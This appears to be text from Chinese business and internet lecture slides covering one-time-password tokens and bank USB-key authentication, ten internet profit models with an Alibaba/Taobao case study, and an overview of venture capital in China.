6、网络产品 “将军令” 是广州网易互动娱乐有限公司自主研发的、具有完全知识产权的高科技身份认证产品。它是专为保护网易通行证账号(游戏账号)、直销商帐号的密码而出的产品,其特有的60秒密码动态自动更新技术将有效的保证您的账号万无一失。 工作原理 “将军令”是采用最先进技术,每隔一分钟将产生一个新的、且唯一的密码,数秒钟后密码自动消失。该密码是在您帐号上新增的一个动态密码,该动态密码不易破解、且有效防止“黑客”入侵。当用户登录时,必须输入:帐号+静态密码+动态密码,确保帐号的安全。 产品特性 1、60秒密码自动更新;2、技术先进,安全无忧;3、动态密码,稳妥保护;4、使用方便,轻松快捷;5、时尚精致,随身携带(赠精美挂绳)。 账号保护适用范围 网易通行证账号和网易经销商通行证账号(含原Esales经销商账号)。网易通行证(《大话西游II》、《梦幻西游》、《大话西游3》、《天下贰》、《飞飞》、《大唐豪侠》、《大话西游外传》、《魔兽世界》) (在使用网易通行证帐号的产品中,目前仅开通与游戏产品的绑与网易其它产品的绑定将在以后陆续开通) 技术 “将军令”是采用最先进技术,每隔一分钟将产生一个全新的、不能重复使用的密码,这是一个在您帐号密码的基础上新增加的一个 动态密码 ,数秒钟后会自动消失。该动态密码无法破解、 安全地与网易各款游戏相绑定,让您能够安然无忧的享受游戏带给您的快乐与刺激,不用担心“黑客”入侵。 服务 当您登录的时候,只需输入:帐号 + 静态密码 + 当时将军令显示的动态密码,操作简单方便。如果有什么需要提供帮助,可以随时登录 ,我们将为您带来更安全,更惊喜,更实惠,更贴心的全方位服务。
136
目前常用的网银认证介质6-移动数字证书 移动数字证书,工行叫U盾,农行叫K宝,建行叫网银盾,光大银行叫阳光网盾,在支付宝中的叫支付盾。它存放着你个人的数字证书,并不可读取。同样,银行也记录着你的数字证书。 当你尝试进行网上交易时, 银行会向你发送由时间字串,地址字串,交易信息字串,防重放攻击字串组合在一起进行加密后得到的字串A, 你的U盾将跟据你的个人证书对字串A进行不可逆运算得到字串B,并将字串B发送给银行, 银行端也同时进行该不可逆运算,如果银行运算结果和你的运算结果一致便认为你合法,交易便可以完成,如果不一致便认为你不合法,交易便会失败。 (理论上,不同的字串A不会得出相同的字串B,即一个字串A对应一个唯一的字串B;但是字串B和字串A无法得出你的数字证书,而且U盾具有不可读取性,所以任何人都无法获行你的数字证书。并且银行每次都会发不同的防重放字串(随机字串)和时间字串,所以当一次交易完成后,刚发出的B字串便不再有效。综上所述,理论上U盾是绝对安全的)
137
目前常用的网银认证介质-总结 现行网上银行一般都是密码+后五种中的一种。
从安全角度:移动数字证书最安全因为只要不丢失是万无一失的;手机动态口令、移动口令牌二种也很安全,但是最好不要被偷窥。 从便捷角度,家庭用户使用文件数字证书最方便,付款只需密码即可,而且也比较安全。网吧用户使用免驱移动数字证书(暂时没有银行提供,招行虽然免驱但是要安客户端)、动态口令牌、手机动态口令、动态口令卡方便。 从经济角度,文件数字证书、动态口令卡、动态手机口令不需费用或很低。而移动数字证书、动态口令牌费用较高(一般50元左右)
138
互联网的十大盈利模式 盈利模式一:在线广告 最主要最常见的网络在线盈利模式,国内做的较好的是 新浪(www.sina.com.cn)、
搜狐( 网易( 大多个人网站的盈利模式也是采用这种方式,靠挂别人的广告生存。 新兴的在线短视频网站,通过影音载入前后的等待时间播放广告主的在线广告。典型例子: 国外的youtube( 国内的56(
139
互联网的十大盈利模式 盈利模式二:彩铃彩信下载、短信发送、电子杂志订阅等电信增值形式 最赚钱的网络盈利模式之一
目前由于受到中国移动等运营商的限制,盈利率有些下降,以此类引力模式为主的上市公司市值较以前有缩水。 典型例子: 空中网( 3G门户(
140
互联网的十大盈利模式 网站盈利模式三:通过网站销售产品 A. 通过网站销售别人的产品(C2C 和 B2C模式) 典型例子:
典型例子: 淘宝( 卓越( )、鲜花网。 B. 通过网站销售自己的产品(含B2C模式) 多数外贸网站和国内中小企业网站,多不胜举
141
互联网的十大盈利模式 典型例子: 盈利模式四:注册会员收费,提供与免费会员差异化的服务
典型例子: 阿里巴巴是中国B2B网站典范。阿里巴巴在收费之前,经历了长达3年的免费期。 “中国供应商” 首先,了解下淘宝的母公司阿里巴巴怎么赚钱 “2002年,阿里巴巴要赢利1元,2003年,要赢利1亿人民币,而2004年,每天利润100万。”2002年4月,正值互联网寒冬,瘦瘦的马云向记者表示,“我之所以敢这样说,是因为阿里巴巴找到了自己的赢利模式。” “好的商业模式一定得简单,阿里巴巴现在的商业模式很简单,就是收取会员费。”马云用3年时间实现了当初的目标。据阿里巴巴内部透露出的数据显示,2004年,阿里巴巴净利润6亿人民币。不过马云仍不愿细讲自己的商业模式,怕透露了营收的真实情况。 记者采访获悉:阿里巴巴上的会员分为两种,一种是中国供应商;一种是诚信通会员。 “中国供应商”服务主要面对出口型的企业,依托网上贸易社区,向国际上通过电子商务进行采购的客商,推荐中国的出口供应商,从而帮助出口供应商获得国际订单。其服务包括独立的“中国供应商”账号和密码,建立英文网址,让全球220个国家逾42万家专业买家在线浏览企业。目前,中国供应商的会员费是6万-8万元/年。 “诚信通”更多针对的是国内贸易,通过向注册会员出示第三方对其的评估,以及在阿里巴巴的交易诚信记录,帮助“诚信通”会员获得采购方的信任。诚信通的会员费是2300元/年。 据阿里巴巴自己披露,截至2005年5月,通过阿里巴巴注册的中国供应商有1万家,诚信通会员注册用户接近10万家(2004年底,阿里巴巴上中国供应商的数目为8000多家,而诚信通会员为6万家)。以此估算,阿里巴巴年营收应接近10亿元(其中诚信通每年应收会员费为2.3亿元,中国供应商每年应收会员费最高为8亿元)。 中国供应商以及诚信通会员除了容易获得买家信赖外,还拥有企业信息的优先发布权,以让客户更快找到企业。“关键在于阿里巴巴必须保证企业的网上身份与真实身份相符,并建立完善的信用评价体系,让大家在一个相互信任的环境里赚钱。”马云说。 “保证诚信的方式有5方面,即第三方认证(企业资信调查机构提供信用认证,认证的内容包括工商部门的合法注册记录,业务授权等);网下的证书和荣誉;阿里巴巴活动记录;会员评价;资信参考人。”马云表示,“中国电子商务要解决的问题主要是诚信问题,这一整套体系就在于确保解决诚信问题。” 阿里巴巴提供的数据显示,除了付费的中国供应商和诚信通会员,阿里巴巴上面还活动着免费的中国商户480万家,海外商户1000万家;去年通过阿里巴巴出口的产品总值为100亿美元,以浙江永康地区为例(全球最大的滑板车供应地),当地企业有70%通过阿里巴巴出口;其中有不少企业出口超过千万美元。 “当这么多人都能通过阿里巴巴赚钱,阿里巴巴也应该赚些小钱。”2002年,正在为阿里巴巴寻找未来的马云表示。 至于阿里巴巴是否会上市去融更多的钱,2004年,马云曾向记者表示,“阿里巴巴至少得将年利润做到10亿元才会上市。” “阿里巴巴的业务没有彩信、网络游戏等政策风险,而且出口是国家鼓励的行业,阿里巴巴上市能获得比新浪、盛大更高的市盈率。”软银中国一位前高管评价。 目前,新浪的市场盈率约为30倍,盛大与网易的市盈率均为35倍。 免费淘宝圈地 阿里巴巴在B2B领域赚得的利润使得它能够养得起一个目前只花钱的“孩子”,即阿里巴巴旗下的客户间(C2C)交易网站淘宝。“淘宝还是个孩子,虽有发展空间,但现在重要的是培育。”马云这样说。 阿里巴巴2003年创办淘宝,当年7月对淘宝注资1亿元,2004年7月再次宣布对淘宝注资3.5亿元。 在中国C2C市场,淘宝的竞争对手eBay显得更为财大气粗。2002年3月,eBay向易趣注资3000万美元,成立eBay易趣;2003年7月,eBay再次对eBay易趣注资1.5亿美元。 C2C网站的收费来源,主要包括交易服务费(包括商品登录费、成交手续费、底价设置费、预售设置费、额外交易费、安全支付费、在线店铺费),特色服务费(包括字体功能费、图片功能费、推荐功能费),增值服务费(信息发布费、辅助信息费),以及网络广告等。 eBay易趣的赢利模式是向用户收取店铺费、商品登录费、交易服务费等费用。普通店铺月租费原为50元/月,去年5月份下调为35元/月;而商品登陆费则因商品类别、价格的不同而不同,最便宜的登录费为0.8元,而较贵的,比如汽车、摩托车等超过2000元的商品的登录费为8元左右。 “与世界级的竞争对手同台,才能显示自己的实力。”马云说。而他显示实力的方式就是淘宝的免费策略。 淘宝目前对所有的商户实行免费,马云说:“淘宝3年不收费。中国的C2C市场还处于市场培育阶段,免费模式更利于跑马圈地。” 马云的免费策略能圈到地吗? 艾瑞咨询(iResearch)2004年度调查报告显示,中国网上拍卖市场上,eBay易趣的注册用户为950万,淘宝网上的注册费为400万,一拍网注册用户约40万,其他拍卖网站注册用户约10万。 报告还显示,2004年中国网上拍卖市场总共约4250万件商品,成交率约为40%,总成交量约为1700万件,成交金额为34亿元。其中eBay易趣的成交额约为22亿元,淘宝成交额约为10亿元。 而按淘宝提供的数据,在2005年第一季度,淘宝的成交额为10.2亿元,易趣成交额为1亿美元,淘宝首次反败为胜。 “除了与淘宝提供的本土化服务有关之外,也与淘宝免费政策有关。”马云这样解释淘宝后来居上的原因。 “有些用户为了逃避eBay易趣的成交费,在eBay易趣发现所需货物后,并没有用eBay易趣的安付通支付,而是选择了淘宝的支付宝,这使有些eBay易趣用户实际上成为淘宝用户。”阿里巴巴一名员工说。 支付宝是阿里巴巴旗下的支付宝公司针对网上交易而推出的安全付款服务,支付宝作为信用中介,在买家确认收到商品前,由支付宝替买卖双方暂时保管货款。 淘宝提供的数据显示,截至2005年2月24日,淘宝网有79%的在线商品交易接受通过支付宝交易。 淘宝如今的免费模式是对阿里巴巴模式的复制。阿里巴巴在收费之前,经历了长达3年的免费期。 马云表示:“那时候,阿里巴巴是花投资者的钱,心里只有对美好未来的信心;淘宝现在烧的钱一部分来自阿里巴巴的赢利,另一部分也来自投资者,同样基于对未来的信心,因为阿里巴巴就是一个例子。” “淘宝还会继续坚持免费,现在还是收小钱的时候,还是跑马圈地的时候,阿里巴巴不急。”马云说
142
互联网的十大盈利模式 盈利模式五:网络游戏运营,虚拟装备和道具买卖 典型例子: 及其游戏地方代理运营商。
网易游戏( ) 盛大游戏( 九城游戏( 及其游戏地方代理运营商。
143
互联网的十大盈利模式 盈利模式六:搜索竞排、产品招商、分类网址和信息整合,付费推荐和抽成盈利 典型例子: 百度(www.baidu.com)
典型例子: 百度( 中国商机在线 ( Hao123( 请客800( 威克平台K68 (
144
互联网的十大盈利模式 盈利模式七:广告中介 广告联盟网站通过给为广告主和站长服务,差价销售广告,获得利润。 典型例子:
广告联盟网站通过给为广告主和站长服务,差价销售广告,获得利润。 典型例子: 弈天广告联盟( ) Iplus广告联盟( 好耶广告联盟( ) 窄告网(
145
互联网的十大盈利模式 盈利模式八:企业信息化服务 A .帮助企业建设维护推广网站 中企动力(www.ce.net.cn)
铭万( )B2B+建站 书生( ) 一站式服务,从代理销售网络实名起家。 B.代理销售大公司的网络产品 几乎每个网络公司都在做,不再举例。 C.网络基础服务提供 万网( 新网( ) D.网络营销策划和搜索引擎优化的专业顾问公司 通王科技 ( ) 新竞争力 (
146
互联网的十大盈利模式 盈利模式九:web2.0网站被巨头收购
web2.0类的网站一般都是用户制造内容,有了社区活跃度,自然会吸引VC( Venture Capital Investment )的眼光,最终的归属应该是被Google、Yahoo、微软等巨头收购了。 盈利模式十:骗人的把戏 这第十条就是非法的了。 十一(融资):每天都有人通过支付宝买卖,快的次日可以到账,慢的要10来天,这样钱在支付宝,淘宝就可以把钱暂时用作他用。 风险投资(Venture Capital Investment 风险资本、风险投资人、投资对象、投资期限、投资目的和投资方式构成了风险投资的六要素。 一、 风险资本 风险资本是指由专业投资人提供的快速成长并且具有很大升值潜力的新兴公司的一种资本。风险资本通过购买股权、提供贷款或既购买股权又提供贷款的方式进入这些企业。 风险资本的来源因时因国而异。在美国,1978年全部风险资本中个人和家庭资金占32%;其次是国外资金,占18%;再次是保险公司资金、年金和大产业公司资金,分别占16%、15%和10%,到了1988年,年金比重迅速上升,占了全部风险资本的46%,其次是国外资金、捐赠和公共基金以及大公司产业资金,分别占14%、12%和11%,个人和家庭资金占的比重大幅下降,只占到了8%。与美国不同,欧洲国家的风险资本主要来源于银行、保险公司和年金,分别占全部风险资本的31%、14%和13%,其中,银行是欧洲风险资本最主要的来源,而个人和家庭资金只占到2%。而在日本,风险资本只要来源于金融机构和大公司资金,分别占36%和37%。其次是国外资金和证券公司资金,各占10%,而个人与家庭资金也只到7%。按投资方式分,风险资本分为直接投资资金和担保资金两类。前者以购买股权的方式进入被投资企业,多为私人资本;而后者以提供融资担保的方式对被投资企业进行扶助,并且多为政府资金。 二、 风险投资人 风险投资人大体可以分为以下四类: ▲A 风险资本家。 他们是向其他企业家投资的企业家,与其他风险投资人一样,他们通过投资来获得利润。但不同的是风险资本家所投出的资本全部归其自身所有,而不是受托管理的资本。 ▲B 风险投资公司。 风险投资公司的种类有很多种,但是大部分公司通过风险投资基金来进行投资,这些基金一般以有限合伙制为组织形式。 ▲C 产业附属投资公司。 这类投资公司往往是一些非金融性实业公司下属的独立风险投资机构,他们代表母公司的利益进行投资。这类投资人通常主要将资金投向一些特定的行业。和传统风险投资一样,产业附属投资公司也同样要对被投资企业递交的投资建议书进行评估,深入企业作尽职调查并期待得到较高的回报。 ▲D 天使投资人。 这类投资人通常投资于非常年轻的公司以帮助这些公司迅速启动。在风险投资领域,“天使投资人”这个词指的是企业家的第一批投资人,这些投资人在公司产品和业务成型之前就把资金投入进来。 三、 投资目的 风险投资虽然是一种股权投资,但投资的目的并不是为了获得企业的所有权,不是为了控股,更不是为了经营企业,而是通过投资和提供增殖服务把投资企业作大,然后通过公开上市(IPO)、兼并收购或其它方式退出,在产权流动中实现投资回报。 四、 投资期限 风险投资人帮助企业成长,但他们最终寻求渠道将投资撤出,以实现增值。风险资本从投入被投资企业起到撤出投资为止所间隔的时间长短就称为风险投资的投资期限。作为股权投资的一种,风险投资的期限一般较长。其中,创业期风险投资通常在7~10年内进入成熟期,而后续投资大多只有几年的期限。 五、 投资对象 风险投资的产业领域主要是高新技术产业。以美国为例,1992年对电脑和软件也的占27%;其次是医疗保健产业,占17%;再次是通信产业,占14%;生物科技产业占10%。 六、 投资方式 从投资性质看,风险投资的方式有三种:一是直接投资。二是提供贷款或贷款担保。三是提供一部分贷款或担保资金同时投入一部分风险资本购买被投资企业的股权。但不管是哪种投资方式,风险投资人一般都附带提供增值服务。风险投资还有两种不同的进入方式。第一种是将风险资本分期分批投入被投资企业,这种情况比较常见,既可以降低投资风险,又有利于加速资金周转;第二种是一次性投入。这种方式不常见,一般风险资本家和天使投资人可能采取这种方式,一次投入后,很难也不愿提供后续资金支持。 [编辑本段] 【风险投资的特征】 1,投资对象多为处于创业期(start-up)的中小型企业,而且多为高新技术企业; 2,投资期限至少3-5年以上,投资方式一般为股权投资,通常占被投资企业30%左右股权,而不要求控股权,也不需要任何担保或抵押; 3,投资决策建立在高度专业化和程序化的基础之上; 4,风险投资人( venture capitalist )一般积极参与被投资企业的经营管理,提供增值服务; 除了种子期(seed)融资外,风险投资人一般也对被投资企业以后各发展阶段的融资需求予以满足; 5,由于投资目的是追求超额回报,当被投资企业增值后,风险投资人会通过上市、收购兼并或其它股权转让方式撤出资本,实现增值。 【风险投资的特点】 风险投资是一种权益资本(Equity),而不是借贷资本(Debt)。风险投资为风险企业投入的权益资本一般占该企业资本总额的30%以上。对于高科技创新企业来说,风险投资是一种昂贵的资金来源,但是它也许是唯一可行的资金来源。银行贷款虽然说相对比较便宜,但是银行贷款回避风险,安全性第一,高科技创新企业无法得到它。 风险投资机制与银行贷款完全不同,其差别在于:首先,银行贷款讲安全性,回避风险;而风险投资却偏好高风险项目,追逐高风险后隐藏的高收益,意在管理风险,驾驭风险。其次,银行贷款以流动性为本;而风险投资却以不流动性为特点,在相对不流动中寻求增长。第三,银行贷款关注企业的现状、企业目前的资金周转和偿还能力;而风险投资放眼未来的收益和高成长性。第四,银行贷款考核的是实物指标;而风险投资考核的是被投资企业的管理队伍是否具有管理水平和创业精神,考核的是高科技的未来市场。最后,银行贷款需要抵押、担保,它一般投向成长和成熟阶段的企业,而风险投资不要抵押,不要担保,它投资到新兴的、有高速成长性的企业和项目。 风险投资是一种长期的(平均投资期为5-7年)流动性差的权益资本。一般情况下,风险投资家不会将风险资本一次全部投入风险企业,而是随着企业的成长不断地分期分批地注入资金。 风险投资家既是投资者又是经营者。风险投资家与银行家不同,他们不仅是金融家,而且是企业家,他们既是投资者,又是经营者。风险投资家在向风险企业投资后,便加入企业的经营管理。也就是说,风险投资家为风险企业提供的不仅仅是资金,更重要的是专业特长和管理经验。 风险投资家在风险企业持有约30%的股份,他们的利益与风险企业的利益紧密相连。风险投资家不仅参与企业的长期或短期的发展规划、企业生产目标的测定、企业营销方案的建立,还要参与企业的资本运营过程,为企业追加投资或创造资金渠道,甚至参与企业重要人员的雇用、解聘。 风险投资最终将退出风险企业。风险投资虽然投入的是权益资本,但他们的目的不是获得企业所有权,而是盈利,是得到丰厚利润和显赫功绩从风险企业退出。 风险投资从风险企业退出有三种方式:首次公开发行(IPO,Initial Public Offering);被其他企业兼并收购或股本回购;破产清算。显然,能使风险企业达到首次公开上市发行是风险投资家的奋斗目标。破产清算则意味着风险投资可能一部分或全部损失。 以何种方式退出,在一定程度上是风险投资成功与否的标志。在作出投资决策之前,风险投资家就制定了具体的退出策略。退出决策就是利润分配决策,以什么方式和什么时间退出可以使风险投资收益最大化为最佳退出决策。 【风险投资家的十大谎言】 1. “我喜欢你的公司,但是我的合伙人不喜欢。”换句话说,就是“no”。这个项目负责人不过是想让创业者们相信他是个好人,聪明人,能真正理解创业 者所做的一切的一个人;而“其他人”却不是这样,所以别怪罪于他。这是在推卸责任;别信他什么其他合伙人不像他一样喜欢这个项目的胡言。他要真这么喜欢,他一定会投钱成交的。 2. “如果你能找到其他VC先投钱,我们就跟。”换言之,“no”。就像一句古老的日本谚语说得那样,“如果你姨有胆魄(注1),她就是你叔了。”阿姨当然没有啦,所以这话是扯淡。说这话的风险投资家其实是说:“我们不看好这单生意,但是如果红杉(Sequoia,注2)先投的话,我们也会跟风。”也就是说,一旦创业者们不需要钱,风险投资家会乐意给他更多--这话如同在说“一旦你看到Larry Csonka不再不寒而栗,我们就会帮你对付他。”而创业者想听到的是“如果你找不到其他VC先投资,我们来投。”这才是一个信任你的投资人。 3. “先做起来给我们看看,然后我们再投资。”言下之意,“no”。这个谎言可以翻译成“我不相信你描绘的大饼,但是你如果能赚大钱证明给我看,那么 你也许能说服我。但是,我不想告诉你我不打算投资,因为我说不定判断失误,然后,老天,你没准还能搞定一个财富500强客户,那时候,我不就活脱脱象个混蛋了。” 4. “我们喜欢和其他风险投资商联合投资。”这就好比太阳总会升起,加拿大人就是喜欢玩曲棍球那样的规律,你要相信风险投资家必是贪婪的。贪婪在风险 投资这个行当里的意思是“如果这是个好项目,我就要一人独吞。”而创业者们想听的正是“这轮投资,我们拿下了。我们不想要任何其他投资者的加入。”然后,创业者们的任务就是去说服他们为何其他投资者的加入能够把蛋糕做得更大,而不是减少他们手里的那块。 5. “我们想要投资你们这个团队。”这句话没讲完。投资团队是没错的,而创业者们听到的意思就是“我们不会解雇你们-如果我们投资全然是因为你们,我 们又怎么可能解雇你们呢?”这可一点儿不是风险投资家的意思。她的意思是,“只要事情进展顺利,我们就会继续对你们这个团队投资,但是如果情况不妙,我们 就会赶你们走,有谁是不可或缺的呀。” 6. “我会放很多精力(原文是带宽)在你们公司上面。”也许他说的是自己办公室里的T3线,但决不是指自己的日程安排,因为他早就在十个董事会里待着了。数一下他得参加多少个董事会议吧。创业者应当假设一个风险投资家每个月花在一家公司上的时间在5-10个小时之间。就是这样。面对现实吧。把董事会议尽量开得简短点! 7. “这是张香草味的投资意向书。”根本不存在什么香草味的投资意向书。你以为每小时收费高达$400的专业投融资律师,就是弄些标准化的投资意向书的吗?如果,创业者们坚持要用冰淇淋的口味来形容投资意向书的话,唯一适用的就是“崎岖之路”口味这就是为什么风险投资家除了离婚律师外,还需要每小时收费$400的投融资专业律师的缘故。 8. “我们能帮你敲开我们客户公司的大门。”这是个双重谎言。首先,一个风险投资家不能总是在客户公司为他人大开方便之门。坦率地说,他的客户公司将 因此而讨厌他。最糟糕的事情莫过于让他来为你引荐了。第二,即使风险投资家能为你开方便之门,创业者们也不能太当真地期待那些公司会成为你的忠实顾客-也就是说,有些东西顶多就是说说而已。 9. “我们喜欢投资创业初期的项目。”风险投资家真正幻想的是把1百万美元投到投资前就已经值2百万美元的公司里去,然后持有这下一个Google的 33%的股份。那才是早期创业投资呢。你知道为什么我们都对Google惊人的投资回报耳熟能详吗?和我们都知道迈克尔.乔丹是一个道理:Google们 和乔丹们均是惊世罕见。如果他们普普通通,就没人写他们的故事了。如果你透过现象看本质,就会发现风险投资家喜欢投资于成功团队(注7, 比如Cisco的创始人),成功技术(注7, 比如荣膺诺贝尔奖的技术),和成熟市场(注7, 比如电子商务)上。我们是异常规避风险的,尤其是因为我们手里的钱并不属于我们自己。 10. 我正在夏威夷的星巴克里写这篇日志。已经待了90分钟了。没带电源插头,所以我的PowerBook笔记本电脑快没电了。你可得喜欢我刚才讲的九条谎言,直到老天爷送来由索尼Vaio团队解救的新苹果笔记本。 【著名风险投资公司】 IDG技术创业投资基金(最早引入中国的VC,也是迄今国内投资案例最多的VC,成功投资过腾讯,搜狐等公司) 投资领域: 软件产业 电信通讯 信息电子 半导体芯片 IT服务 网络设施 生物科技 保健养生 软银中国创业投资有限公司(日本孙正义资本,投资过阿里巴巴,盛大等公司) 投资领域: IT服务 软件产业 半导体芯片 电信通讯 硬件产业 网络产业 凯雷投资集团(美国著名PE,投资太平洋保险集团,徐工集团) 投资领域: IT服务 软件产业 电信通讯 网络产业 信息电子 半导体芯片 红杉资本中国基金 (美国著名互联网投资机构,投资过甲骨文,思科等公司) 高盛亚洲(著名券商,引领世界IPO潮流,投资双汇集团等) 摩根士丹利(世界著名财团,投资蒙牛等) 美国华平投资集团(投资哈药集团,国美电器等公司) 鼎晖资本(投资过南孚电池,蒙牛等企业) 联想投资有限公司(国内著名资本) 投资领域: 软件产业 IT服务 半导体芯片 网络设施 网络产业 电信通讯 浙江浙商创业投资股份有限公司(民企) 投资领域:关注(但不限于)电子信息、环保、医药化工、新能源、文化教育、生物科技、新媒体等行业及传统行业产生重大变革的优秀中小型企业。 今日资本,2005年创立,是一家专注于中国成长性企业的国际投资基金,目前的一期基金管理着超过2.8亿美元的基金,主要来自英国政府基金、世界银行等著名投资机构。今日资本已投资项目包括我要钻石网、土豆网、真功夫等中国企业。 红杉资本,红杉资本创始于1972年,共有18只基金,超过40亿美元总资本,总共投资超过500家公司,200多家成功上市,100多个通过兼并收购成功退出的案例。 软银赛富投资顾问有限公司是一家总部设在香港主导亚洲区域投资的企业,在中国、印度和韩国有分支机构。软银赛富投资顾问有限公司目前已参与投资近20亿美元。软银赛富投资顾问有限公司投资领域横跨几个高成长性部门,涵盖消费品&服务、技术、媒介、电信、金融服务、医疗保健、旅行和旅游业,和制造业。软银赛富投资顾问有限公司致力服务于中国、印度、韩国、香港和台湾等地区。投资团队集中在香港、中国(北京、上海、天津),印度(海得拉巴,新德里),和韩国(首尔)。软银赛富投资顾问有限公司形成了的投资团队拥有丰富的投资经验。并为其与合作企业建立的牢固伙伴关系而感到自豪。 “一部风险投资在华史就是一部中国互联网史”,不少互联网大腕曾引用过这句精准语言,因为他们自己背后的故事就是与风险投资交融的历史。当1996年张朝阳凭借自己的执着和对国外互联网公司的简单模仿融来的18.5万美元来到中国创办谁都听不懂的互联网公司时,人们明白了商业计划书可以换来创业资金的简单道理。 在美国,一个风险投资商(VC)的对于创业项目的成功几率控制在10%左右,已经是非常成功了。因为任何一个成功的创业项目给风险投资商带来的回报可能是几十倍、甚至几百倍。这样,一个项目的成功收益往往可以大大高于其他9个项目失败而付出的成本。 不过,这样简单的数学计算题,拿到1996年的中国传统经济领域中看待,仍然有些不可思议。以至于上个世纪80年代末在美国硅谷诞生的风险投资行业,在中国一段时间内,要么被神化,要么被妖魔化——风险投资商们到底是聪明的还是愚蠢的,行业外的人可能会从不同的角度得出这两种不同的结论。 从人们的早期记忆来看,风险投资像“疯钱”、“傻钱”。1998年~1999年那个年代,在咖啡馆里拿着商业计划书给投资人讲生动故事的大有人在,在几个星期内融到几百万甚至几千万美金绝不是天方夜谭。更有意思的是,外国风险投资商会主动要求,创业这最好在项目中占据主要的股份,投入的资金必须在一段时间内花完,等等传统投资商很难想象的投资原则。 正如一位业内人士曾如此描述当初第一波互联网热潮时情景:在一家知名的国外风险投资公司的办公室,墙上挂着一张很大的项目统计表,但在近百个项目中,只有少数几个标记着盈利的符号。但是,这家风险投资商却非常自豪,因为他抢先占领了中国互联网市场的重要位置,更为重要的是,纳斯达克上市的企业中,并没有已经盈利的要求。 事实上,早期从新浪、搜狐、网易等身上赚取大把银子的风险投资大有人在。当年像IDG、华登这样开荒者,都成为了中国互联网产业的幸运者和获益者。 中国互联网产业若没有这些慷慨解囊者断然没有今天。即便到今天,几乎所有的中国大型商业网站的背后都是风险投资的身影: 1999年2月,才树立起大旗不久的新浪网宣布获得了包括高盛银行在内的海外风险投资2500万美金,这在当时肯定是国内网络公司获得到的最大一笔投资,为此它也拉开了上世纪末中国互联网服务企业进军海外资本市场的序幕。 1999年7月14日,中华网在纳斯达克独立上市成功,首次公募9600万美元,开创中国网络股概念,同时也预示着风险投资商成功套现。 于是,风险投资开始沸腾了。1999年下半年开始,大批的海归派搂着千万甚至上亿资金的风险投资创立了成千上万的网络公司。只是紧接着的是铺天盖地的广告宣传、各种免费服务、高昂的薪水诱惑、豪华的写字楼等等。 然而,后来的现实却给热情的风险资本泼了大大的一瓢凉水。随着纳斯达克网络股的暴跌,这些外国风险投资在中国冒冒失失地来,凄凄惨惨地走。 这种惨痛历史很大程度来自于纳斯达克模式在中国的照搬。纳斯达克股市在 年互联网热潮时普遍认为,在一个行业发展的起飞阶段,真正重要的不是盈利,而是增长速度和市场份额。华尔街的一位分析家曾说:“在这一阶段,盈利并不能说明什么。投资者能够理解,在行业的早期增长过程中,保持高速增长和占有市场领先份额具有极为重要的战略优势。” 事实一开始的确如预想中的一样,网民成倍增长,互联网企业的用户规模不断膨胀,但很快,产业走向低潮,风险投资们也跟着前赴后继地倒下。 对于风险投资对中国互联网的作用,曾有人分析,至少教会了很多人上网,也培育了很多的中国互联网精英,也才使得中国互联网在2003年以后的重新崛起。而且,网络泡沫破灭的好处是,驱逐了风险投资中的鸟枪炒家,迎来了真正的VC正规军。 产业轮回,变幻一瞬间。冷清几年的纳斯达克一复苏,在中国投资的风险投资商们又开始活跃。日本软银的孙正义因多年前就看好互联网宽带应用,因而在互联网泡沫时期成为最大的输家,至今软银的财务报表仍十分难看。但是,软银对上海盛大网络的投资则是经典之极——当时盛大已经在网络游戏圈内规模渐大,只差最后一笔资金助力,软银适时出手,并且在不到2年内将盛大送上纳斯达克,成功套现。 当2004年有包括携程、盛大网络、Tom、e龙、第九城市、掌上灵通、空中网、前程无忧和金融界在内的多达九家的中国互联网公司在纳斯达克成功上市时,另一批在产业低潮期没有坚持下去的风险投资商们又感叹,为何当初没眼力。 风险投资“风向标”透露了一个信号:眼前的低潮绝不是永远的低潮。对于一个真正的投资人来说,只要这个市场足够大,就肯定存在投资的机会。 根据相关统计,2004年,由美国风险资本在中国达成的交易达到了43宗,是10年来的最高水平;而2005年,聚积在中国互联网上空的风险资本据说多达20亿美元,令人惊呼是否泡沫时代又来临。一些打着WEB 2.0旗号的创业者,又开始与风险投资商们频频互抛媚眼,各种以创业和投资为主题的论坛重新人满为患,可谓是“年年岁岁花相似,岁岁年年人不同。” 中国风险投资VC的潜规则: 规则一:原来VC也讲等级规则二:越投越贵,越贵越投规则三:注重人脉规则四:近地缘规则五:VC是最昂贵的融资方式规则六:VC失手是常事规则七:拔苗助长、落袋为安规则八:不要为VC放弃权底限规则九:保持清醒,不要相信VC的赞誉之辞规则十:VC是功利的经济动物,随时可能“变脸” 规则十一:一个行业的想象空间只有那么大规则十二:VC的中国异化 【企业如何寻找风险投资】 很多企业不理解,自己企业这么好,风投他们听了看了怎么都没有反应?我们把企业看成我们的产品,这个产品在未来一段时间内变得更有价值,我们才能转手卖掉他获得价值。那么,企业上市前要不要私募介入?私募到底能带给你什么?为什么向私募推荐自己的企业,对方无动于衷?而在私募的眼里,你的企业持续高增长的机会又在哪里? 传统行业为什么要和私募“谈恋爱”? 从私人企业变成一个公众的上市公司,你的企业在公司治理方面还存在很多限制。在这之前,私募中小企业融资的介入则更像在和你谈恋爱。 第一步检验你的商业模式,过去的成功代表你选对了商业的时机赚到了钱。但这不能代表你未来还有一个更好的发展,很可能现在的模式会成为未来你失败的原因。所以在这场恋爱中,私募会与你探讨总结在过去生意发展过程中积累下来的可复制的、可持续的模式,并找出哪些是特定商业周期里可以预计的东西。 所谓的商业模式就是你这个公司存在的基础是什么,你能为客户提供哪些有价值的产品或者是服务,然后你因为这个产品或者是服务赚到哪些人的钱。过去生意做得很成功,但没有很好地利用,这个特别是需要总结,特别是传统行业。 根据你存在的短板,以及在行业发展趋势中,未来的压力会给你怎样的定位,制定一个未来的发展战略或者是规划,这在上市之前是必要的。如果你有多元的业务,有的业务长远来讲没有什么发展前途,但是从现实的角度来看,却对企业有支持,那么就需要你制定管理资源的规划。你的资源管理都是有限度的,到底如何去分配管理、资金等资源,逐步加重投放到你未来重点发展的业务上,这就是不同业务之间的管理模式。 我们企业在不同发展阶段面临的问题,以及一家私营企业最后如何成为一家上市公司,而且是一个健康的上市公司,我们有很多的经验。很多企业家会发现跟私募投资人接触太晚了,因为过去不懂,没有尽早把公司结构理清,等到快要上市了,这时候的代价就非常昂贵。 除了钱,你还要私募给你什么? 我们除了钱以外,还能带给你很多价值,即所谓的增值服务。投资者是你的一面镜子,你的企业处于快速发展过程中,可能没有时间也很难获得一个全面的角度,来审视你的业务,包括你的团队。 